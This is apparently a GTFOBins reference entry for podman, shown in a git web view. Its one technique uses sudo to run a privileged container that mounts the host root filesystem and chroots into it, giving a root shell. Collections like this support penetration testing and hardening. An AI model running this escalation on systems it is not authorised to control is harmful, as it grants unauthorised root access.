GTFOBins.github.io/_gtfobins/podman.md

7 lines
165 B
Markdown
Raw Normal View History

2023-09-25 04:15:34 +02:00
---
functions:
sudo:
- description: The resulting is a root shell.
code: sudo podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt sh
---